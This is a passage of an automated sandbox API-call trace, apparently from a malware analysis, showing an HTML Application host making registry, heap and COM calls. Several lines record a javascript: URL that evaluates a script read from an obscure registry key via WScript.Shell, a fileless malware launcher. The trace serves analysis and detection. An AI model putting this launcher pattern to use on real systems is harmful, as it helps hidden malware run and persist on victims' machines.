Flags=0x0, Size=0x10) returned 0x6247b0 [0066.126] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x5c) returned 0x64b9b8 [0066.126] GetDC (hWnd=0x0) returned 0x1b0101ce [0066.126] GetDeviceCaps (hdc=0x1b0101ce, index=88) returned 96 [0066.126] ReleaseDC (hWnd=0x0, hDC=0x1b0101ce) returned 1 [0066.126] MulDiv (nNumber=100000, nNumerator=96, nDenominator=96) returned 100000 [0066.127] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x18eac0 | out: phkResult=0x18eac0*=0x130) returned 0x0 [0066.127] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x18eac4 | out: phkResult=0x18eac4*=0x198) returned 0x0 [0066.127] RegOpenKeyExW (in: hKey=0x198, lpSubKey="FEATURE_WEBOC_DOCUMENT_ZOOM", ulOptions=0x0, samDesired=0x1, phkResult=0x18ea80 | out: phkResult=0x18ea80*=0x0) returned 0x2 [0066.127] RegOpenKeyExW (in: hKey=0x130, lpSubKey="FEATURE_WEBOC_DOCUMENT_ZOOM", ulOptions=0x0, samDesired=0x1, phkResult=0x18ea80 | out: phkResult=0x18ea80*=0x0) returned 0x2 [0066.127] RegCloseKey (hKey=0x0) returned 0x6 [0066.127] RegCloseKey (hKey=0x0) returned 0x6 [0066.127] RegCloseKey (hKey=0x130) returned 0x0 [0066.127] RegCloseKey (hKey=0x198) returned 0x0 [0066.128] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x10) returned 0x6249f0 [0066.128] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x44) returned 0x6293b0 [0066.128] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x5c) returned 0x64ba20 [0066.128] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76d30000 [0066.128] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeSRWLock") returned 0x77c78456 [0066.128] GetProcAddress (hModule=0x76d30000, lpProcName="AcquireSRWLockExclusive") returned 0x77c729f1 [0066.128] GetProcAddress (hModule=0x76d30000, lpProcName="AcquireSRWLockShared") returned 0x77c72560 [0066.129] GetProcAddress (hModule=0x76d30000, lpProcName="ReleaseSRWLockExclusive") returned 0x77c729ab [0066.129] GetProcAddress (hModule=0x76d30000, lpProcName="ReleaseSRWLockShared") returned 0x77c725a9 [0066.129] RtlInitializeConditionVariable () returned 0x64ba54 [0066.129] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x34) returned 0x64ba88 [0066.129] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x34) returned 0x64bac8 [0066.129] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x14) returned 0x633528 [0066.129] IUnknown:AddRef (This=0x6421f8) returned 0x0 [0066.129] IUnknown:Release (This=0x6421f8) returned 0x1 [0066.129] IUnknown:Release (This=0x75028cb0) returned 0x1 [0066.129] IUnknown:QueryInterface (in: This=0x6421f8, riid=0x74cab75c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x18f894 | out: ppvObject=0x18f894*=0x6421f8) returned 0x0 [0066.129] IUnknown:Release (This=0x6421f8) returned 0x1 [0066.130] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x28) returned 0x62d0c0 [0066.233] IUnknown_QueryService (in: punk=0x750296a4, guidService=0x74cb880c*(Data1=0xd81f90a3, Data2=0x8156, Data3=0x44f7, Data4=([0]=0xad, [1]=0x28, [2]=0x5a, [3]=0xbb, [4]=0x87, [5]=0x0, [6]=0x32, [7]=0x74)), riid=0x74cb880c*(Data1=0xd81f90a3, Data2=0x8156, Data3=0x44f7, Data4=([0]=0xad, [1]=0x28, [2]=0x5a, [3]=0xbb, [4]=0x87, [5]=0x0, [6]=0x32, [7]=0x74)), ppvOut=0x642250 | out: ppvOut=0x642250*=0x0) returned 0x80004005 [0066.233] IUnknown:QueryInterface (in: This=0x750296a4, riid=0x773042d8*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x18f810 | out: ppvObject=0x18f810*=0x750296b8) returned 0x0 [0066.233] IServiceProvider:QueryService (in: This=0x750296b8, guidService=0x74cb880c*(Data1=0xd81f90a3, Data2=0x8156, Data3=0x44f7, Data4=([0]=0xad, [1]=0x28, [2]=0x5a, [3]=0xbb, [4]=0x87, [5]=0x0, [6]=0x32, [7]=0x74)), riid=0x74cb880c*(Data1=0xd81f90a3, Data2=0x8156, Data3=0x44f7, Data4=([0]=0xad, [1]=0x28, [2]=0x5a, [3]=0xbb, [4]=0x87, [5]=0x0, [6]=0x32, [7]=0x74)), ppvObject=0x642250 | out: ppvObject=0x642250*=0x0) returned 0x80004005 [0066.233] IUnknown:Release (This=0x750296b8) returned 0x1 [0066.233] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x34) returned 0x64bb08 [0066.233] IInternetSecurityManager:SetSecuritySite (This=0x643e78, pSite=0x642934) returned 0x0 [0066.233] IUnknown:Release (This=0x642934) returned 0x0 [0066.233] IUnknown:AddRef (This=0x642934) returned 0x28 [0066.234] IUnknown:QueryInterface (in: This=0x642934, riid=0x768261d0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x18f848 | out: ppvObject=0x18f848*=0x642938) returned 0x0 [0066.234] IServiceProvider:QueryService (in: This=0x642938, guidService=0x7682f13c*(Data1=0xf1e50292, Data2=0xa795, Data3=0x4117, Data4=([0]=0x8e, [1]=0x9, [2]=0x2b, [3]=0x56, [4]=0xa, [5]=0x72, [6]=0xac, [7]=0x60)), riid=0x7682f13c*(Data1=0xf1e50292, Data2=0xa795, Data3=0x4117, Data4=([0]=0x8e, [1]=0x9, [2]=0x2b, [3]=0x56, [4]=0xa, [5]=0x72, [6]=0xac, [7]=0x60)), ppvObject=0x643ea0 | out: ppvObject=0x643ea0*=0x0) returned 0x80004002 [0066.234] IServiceProvider:QueryService (in: This=0x642938, guidService=0x7682f12c*(Data1=0xf164edf1, Data2=0xcc7c, Data3=0x4f0d, Data4=([0]=0x9a, [1]=0x94, [2]=0x34, [3]=0x22, [4]=0x26, [5]=0x25, [6]=0xc3, [7]=0x93)), riid=0x7682f12c*(Data1=0xf164edf1, Data2=0xcc7c, Data3=0x4f0d, Data4=([0]=0x9a, [1]=0x94, [2]=0x34, [3]=0x22, [4]=0x26, [5]=0x25, [6]=0xc3, [7]=0x93)), ppvObject=0x643e9c | out: ppvObject=0x643e9c*=0x0) returned 0x80004002 [0066.234] IServiceProvider:QueryService (in: This=0x642938, guidService=0x7681c484*(Data1=0x79eac9ee, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), riid=0x7681c484*(Data1=0x79eac9ee, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x643e98 | out: ppvObject=0x643e98*=0x750296bc) returned 0x0 [0066.234] IUnknown:Release (This=0x642938) returned 0x0 [0066.234] CoTaskMemAlloc (cb=0x6d) returned 0x64bb48 [0066.234] CoTaskMemAlloc (cb=0x9) returned 0x63f368 [0066.234] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0xc) returned 0x63f380 [0066.234] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x4c) returned 0x64bbc0 [0066.238] StrChrW (lpStart="HTA", wMatch=0x3b) returned 0x0 [0066.239] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x44) returned 0x629400 [0066.240] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0xc) returned 0x63f398 [0066.240] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x10) returned 0x63f3b0 [0066.242] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x4) returned 0x63b940 [0066.242] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x20) returned 0x644b28 [0066.242] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x10) returned 0x63f3c8 [0066.242] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x94) returned 0x64bc18 [0066.242] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x34) returned 0x64bcb8 [0066.242] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x70) returned 0x64bcf8 [0066.244] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0xf8) returned 0x64bd70 [0066.245] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x8b4) returned 0x64be70 [0066.245] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x10) returned 0x63f3e0 [0066.245] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0066.245] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x10) returned 0x63f3f8 [0066.245] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x84) returned 0x64c730 [0066.308] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x800) returned 0x64c7c0 [0066.308] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x800) returned 0x64cfc8 [0066.308] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x4c) returned 0x64d7d0 [0066.308] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x800) returned 0x64d828 [0066.309] IsCharSpaceW (wch=0x48) returned 0 [0066.309] IsCharAlphaNumericW (ch=0x5c) returned 0 [0066.309] IsCharSpaceW (wch=0x5c) returned 0 [0066.309] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x18) returned 0x633548 [0066.309] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x50) returned 0x64e030 [0066.309] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x14) returned 0x633568 [0066.309] IsCharSpaceW (wch=0x41) returned 0 [0066.309] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0xc) returned 0x63f410 [0066.309] IsCharAlphaNumericW (ch=0x20) returned 0 [0066.309] IsCharSpaceW (wch=0x20) returned 1 [0066.309] IsCharSpaceW (wch=0x7b) returned 0 [0066.309] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x1c) returned 0x644b50 [0066.309] IsCharSpaceW (wch=0x20) returned 1 [0066.309] IsCharAlphaNumericW (ch=0x7b) returned 0 [0066.309] IsCharSpaceW (wch=0x62) returned 0 [0066.309] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x64e030 | out: hHeap=0x610000) returned 1 [0066.309] IsCharAlphaNumericW (ch=0x3a) returned 0 [0066.309] IsCharSpaceW (wch=0x3a) returned 0 [0066.309] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x1c) returned 0x644b78 [0066.402] IsCharAlphaNumericW (ch=0x3a) returned 0 [0066.402] IsCharSpaceW (wch=0x75) returned 0 [0066.402] IsCharAlphaNumericW (ch=0x28) returned 0 [0066.402] IsCharSpaceW (wch=0x28) returned 0 [0066.402] IsCharAlphaNumericW (ch=0x28) returned 0 [0066.402] IsCharSpaceW (wch=0x23) returned 0 [0066.402] IsCharSpaceW (wch=0x23) returned 0 [0066.402] IsCharSpaceW (wch=0x7d) returned 0 [0066.402] IsCharAlphaNumericW (ch=0x7d) returned 0 [0066.402] IsCharSpaceW (wch=0x29) returned 0 [0066.402] IsCharSpaceW (wch=0x75) returned 0 [0066.402] IsCharSpaceW (wch=0x75) returned 0 [0066.402] IsCharSpaceW (wch=0x29) returned 0 [0066.402] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x14) returned 0x6335a8 [0066.402] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x34) returned 0x64e238 [0066.402] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x40) returned 0x624050 [0066.402] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x10) returned 0x63f428 [0066.402] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x10) returned 0x63f440 [0066.402] CoTaskMemFree (pv=0x64bb48) [0066.402] CoTaskMemFree (pv=0x63f368) [0066.402] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x14) returned 0x6335c8 [0066.403] LoadLibraryA (lpLibFileName="OLEAUT32.dll") returned 0x76e40000 [0066.403] GetProcAddress (hModule=0x76e40000, lpProcName=0x6) returned 0x76e43e59 [0066.403] StrCmpCW (pszStr1="Software\\Microsoft\\Internet Explorer", pszStr2="Software\\Microsoft\\Windows Mail\\Trident") returned -14 [0066.403] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x340) returned 0x64e278 [0066.403] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x4a) returned 0x64bb48 [0066.403] IsOS (dwOS=0x25) returned 1 [0066.403] GetSysColor (nIndex=26) returned 0xcc6600 [0066.403] IsOS (dwOS=0x25) returned 1 [0066.403] GetSysColor (nIndex=5) returned 0xffffff [0066.403] GetSysColor (nIndex=8) returned 0x0 [0066.403] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0066.404] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x10) returned 0x63f368 [0066.422] wcstol (in: _String="0,0,255", _EndPtr=0x18e4a4, _Radix=10 | out: _EndPtr=0x18e4a4*=",0,255") returned 0 [0066.422] wcstol (in: _String="0,255", _EndPtr=0x18e4a4, _Radix=10 | out: _EndPtr=0x18e4a4*=",255") returned 0 [0066.422] wcstol (in: _String="255", _EndPtr=0x18e4a4, _Radix=10 | out: _EndPtr=0x18e4a4*="") returned 255 [0066.422] wcstol (in: _String="128,0,128", _EndPtr=0x18e4a4, _Radix=10 | out: _EndPtr=0x18e4a4*=",0,128") returned 128 [0066.422] wcstol (in: _String="0,128", _EndPtr=0x18e4a4, _Radix=10 | out: _EndPtr=0x18e4a4*=",128") returned 0 [0066.422] wcstol (in: _String="128", _EndPtr=0x18e4a4, _Radix=10 | out: _EndPtr=0x18e4a4*="") returned 128 [0066.425] GetModuleHandleW (lpModuleName="EXPLORER.EXE") returned 0x0 [0066.425] GetModuleHandleW (lpModuleName="IEXPLORE.EXE") returned 0x0 [0066.425] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\PageSetup", ulOptions=0x0, samDesired=0x20019, phkResult=0x18f55c | out: phkResult=0x18f55c*=0xa8) returned 0x0 [0066.425] SHGetValueW (in: hkey=0xa8, pszSubKey=0x0, pszValue="Print_Background", pdwType=0x0, pvData=0x18f560, pcbData=0x18f558*=0xa | out: pdwType=0x0, pvData=0x18f560, pcbData=0x18f558*=0xa) returned 0x2 [0066.425] RegCloseKey (hKey=0xa8) returned 0x0 [0066.426] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x80) returned 0x64f600 [0066.426] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x10) returned 0x63f350 [0066.426] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x3a) returned 0x6240e0 [0066.427] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x6a) returned 0x64fa88 [0066.482] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x10) returned 0x624798 [0066.482] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x26) returned 0x62d0f0 [0066.482] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x6e) returned 0x64fb00 [0066.483] GetProcessHeap () returned 0x610000 [0066.483] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x64e5c0 | out: hHeap=0x610000) returned 1 [0066.483] GetProcessHeap () returned 0x610000 [0066.483] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x64e618 | out: hHeap=0x610000) returned 1 [0066.483] GetProcessHeap () returned 0x610000 [0066.483] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x63b950 | out: hHeap=0x610000) returned 1 [0066.483] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x14) returned 0x6335e8 [0066.483] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x10) returned 0x6247c8 [0066.484] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x14) returned 0x633608 [0066.484] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x40) returned 0x624128 [0066.484] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x60) returned 0x64fb78 [0066.485] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x24) returned 0x62d120 [0066.485] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x1c) returned 0x644bc8 [0066.485] GetAcceptLanguagesW () returned 0x0 [0066.485] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x10) returned 0x6249a8 [0066.485] GetClassNameW (in: hWnd=0x40162, lpClassName=0x18f82c, nMaxCount=10 | out: lpClassName="HTML Appl") returned 9 [0066.485] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="HTML Appl", cchCount1=9, lpString2="HH Parent", cchCount2=9) returned 3 [0066.485] GetParent (hWnd=0x40162) returned 0x50116 [0066.485] GetClassNameW (in: hWnd=0x50116, lpClassName=0x18f82c, nMaxCount=10 | out: lpClassName="HTML Appl") returned 9 [0066.486] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="HTML Appl", cchCount1=9, lpString2="HH Parent", cchCount2=9) returned 3 [0066.486] GetParent (hWnd=0x50116) returned 0x0 [0066.486] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x14) returned 0x633628 [0066.486] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x28) returned 0x62d150 [0066.486] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x633628 | out: hHeap=0x610000) returned 1 [0066.528] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x4c) returned 0x64fbe0 [0066.528] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0xe) returned 0x64f6e8 [0066.528] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x94) returned 0x64fc38 [0066.528] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x14) returned 0x633628 [0066.528] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x12) returned 0x633648 [0066.529] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x14) returned 0x633668 [0066.529] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0xe) returned 0x64f700 [0066.529] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x10) returned 0x64f718 [0066.529] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0xe) returned 0x64f730 [0066.529] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x10) returned 0x64f748 [0066.529] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x1c) returned 0x644bf0 [0066.529] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x1a) returned 0x644c18 [0066.529] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x1a) returned 0x644c40 [0066.529] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x12) returned 0x633688 [0066.529] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x12) returned 0x6336a8 [0066.529] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x12) returned 0x6336c8 [0066.529] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x12) returned 0x6336e8 [0066.529] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x10) returned 0x64f760 [0066.530] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0xc) returned 0x64f790 [0066.530] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x10) returned 0x64f7a8 [0066.530] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x12) returned 0x633708 [0066.530] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0xe) returned 0x64f7c0 [0066.530] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0xa) returned 0x64f7d8 [0066.530] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x26) returned 0x62d180 [0066.530] GetProcessHeap () returned 0x610000 [0066.530] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x644c68 | out: hHeap=0x610000) returned 1 [0066.530] GetProcessHeap () returned 0x610000 [0066.530] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x644c90 | out: hHeap=0x610000) returned 1 [0066.530] GetProcessHeap () returned 0x610000 [0066.530] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x644cb8 | out: hHeap=0x610000) returned 1 [0066.530] GetProcessHeap () returned 0x610000 [0066.530] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x624768 | out: hHeap=0x610000) returned 1 [0066.530] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x64f760 | out: hHeap=0x610000) returned 1 [0066.531] IMoniker:GetDisplayName (in: This=0x620638, pbc=0x0, pmkToLeft=0x0, ppszDisplayName=0x18f7f0 | out: ppszDisplayName=0x18f7f0*="javascript:eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\\\Software\\\\[M[ZF\\\\HMEYE'));close();") returned 0x0 [0066.531] IUnknown:QueryInterface (in: This=0x620638, riid=0x74c272f4*(Data1=0xa158a630, Data2=0xed6f, Data3=0x45fb, Data4=([0]=0xb9, [1]=0x87, [2]=0xf6, [3]=0x86, [4]=0x76, [5]=0xf5, [6]=0x77, [7]=0x52)), ppvObject=0x18f7c8 | out: ppvObject=0x18f7c8*=0x620644) returned 0x0 [0066.531] IUriContainer:GetIUri (in: This=0x620644, ppIUri=0x18f7f8 | out: ppIUri=0x18f7f8*=0x63c68c) returned 0x0 [0066.531] IUnknown:Release (This=0x620644) returned 0x1 [0066.531] IUnknown:AddRef (This=0x620638) returned 0x2 [0066.531] IUnknown:AddRef (This=0x63c68c) returned 0x5 [0066.531] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0066.531] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0066.531] IMoniker:GetDisplayName (in: This=0x620638, pbc=0x0, pmkToLeft=0x0, ppszDisplayName=0x18f6d0 | out: ppszDisplayName=0x18f6d0*="javascript:eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\\\Software\\\\[M[ZF\\\\HMEYE'));close();") returned 0x0 [0066.531] UrlGetLocationW (psz1="javascript:eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\\\Software\\\\[M[ZF\\\\HMEYE'));close();") returned 0x0 [0066.532] CreateURLMonikerEx (in: pMkCtx=0x0, szURL="javascript:eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\\\Software\\\\[M[ZF\\\\HMEYE'));close();", ppmk=0x18f69c*=0x0, dwFlags=0x1 | out: ppmk=0x18f69c*=0x64e618) returned 0x0 [0066.532] DllGetClassObject (in: rclsid=0x640b9c*(Data1=0x3050f3b2, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), riid=0x76814430*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18f1e0 | out: ppv=0x18f1e0*=0x75028d20) returned 0x0 [0066.532] IUnknown:QueryInterface (in: This=0x75028d20, riid=0x7683aadc*(Data1=0x79eac9ec, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x18f2cc | out: ppvObject=0x18f2cc*=0x75028d2c) returned 0x0 [0066.532] IUnknown:Release (This=0x75028d20) returned 0x1 [0066.532] IInternetProtocolInfo:ParseUrl (in: This=0x75028d2c, pwzUrl="javascript:eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\\\Software\\\\[M[ZF\\\\HMEYE'));close();", ParseAction=1, dwParseFlags=0x10000, pwzResult=0x64fcd8, cchResult=0x824, pcchResult=0x18f5e0, dwReserved=0x0 | out: pwzResult="", pcchResult=0x18f5e0*=0x0) returned 0x800c0011 [0066.532] IUnknown:Release (This=0x75028d2c) returned 0x1 [0066.533] CreateUri (in: pwzURI="javascript:eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\\\Software\\\\[M[ZF\\\\HMEYE'));close();", dwFlags=0x2b84, dwReserved=0x0, ppURI=0x18f694 | out: ppURI=0x18f694*=0x63be1c) returned 0x0 [0066.533] IUri:GetScheme (in: This=0x63be1c, pdwScheme=0x18f62c | out: pdwScheme=0x18f62c*=0xf) returned 0x0 [0066.533] CoInternetIsFeatureEnabled (FeatureEntry=0x1, dwFlags=0x2) returned 0x1 [0066.533] IUnknown:QueryInterface (in: This=0x63be1c, riid=0x74cad6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x18f634 | out: ppvObject=0x18f634*=0x63be1c) returned 0x0 [0066.534] IUnknown:Release (This=0x63be1c) returned 0x2 [0066.534] IUnknown:AddRef (This=0x63be1c) returned 0x3 [0066.534] IUnknown:Release (This=0x63be1c) returned 0x2 [0066.534] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0066.534] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x1c) returned 0x644cb8 [0066.534] IUnknown:AddRef (This=0x63be1c) returned 0x3 [0066.534] IUri:GetAbsoluteUri (in: This=0x63be1c, pbstrAbsoluteUri=0x644cb8 | out: pbstrAbsoluteUri=0x644cb8*="javascript:eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\\\Software\\\\[M[ZF\\\\HMEYE'));close();") returned 0x0 [0066.534] IUnknown:Release (This=0x63be1c) returned 0x2 [0066.534] IUnknown:AddRef (This=0x64e618) returned 0x2 [0066.534] IUnknown:Release (This=0x64e618) returned 0x1 [0066.534] IUnknown:AddRef (This=0x620638) returned 0x3 [0066.534] IUnknown:Release (This=0x64e618) returned 0x0 [0066.534] IUnknown:AddRef (This=0x620638) returned 0x4 [0066.534] IUnknown:QueryInterface (in: This=0x63c68c, riid=0x74cad6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x18f49c | out: ppvObject=0x18f49c*=0x63c68c) returned 0x0 [0066.534] IUnknown:Release (This=0x63c68c) returned 0x5 [0066.534] IUnknown:AddRef (This=0x63c68c) returned 0x6 [0066.534] IUnknown:QueryInterface (in: This=0x620638, riid=0x74c272f4*(Data1=0xa158a630, Data2=0xed6f, Data3=0x45fb, Data4=([0]=0xb9, [1]=0x87, [2]=0xf6, [3]=0x86, [4]=0x76, [5]=0xf5, [6]=0x77, [7]=0x52)), ppvObject=0x18f470 | out: ppvObject=0x18f470*=0x620644) returned 0x0 [0066.534] IUriContainer:GetIUri (in: This=0x620644, ppIUri=0x18f4c4 | out: ppIUri=0x18f4c4*=0x63c68c) returned 0x0 [0066.534] IUnknown:Release (This=0x620644) returned 0x4 [0066.534] IUnknown:AddRef (This=0x620638) returned 0x5 [0066.534] IUnknown:Release (This=0x620638) returned 0x4 [0066.534] IUnknown:AddRef (This=0x63c68c) returned 0x8 [0066.535] IUnknown:QueryInterface (in: This=0x63c68c, riid=0x74cad6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x18f49c | out: ppvObject=0x18f49c*=0x63c68c) returned 0x0 [0066.535] IUnknown:Release (This=0x63c68c) returned 0x8 [0066.535] IUnknown:AddRef (This=0x63c68c) returned 0x9 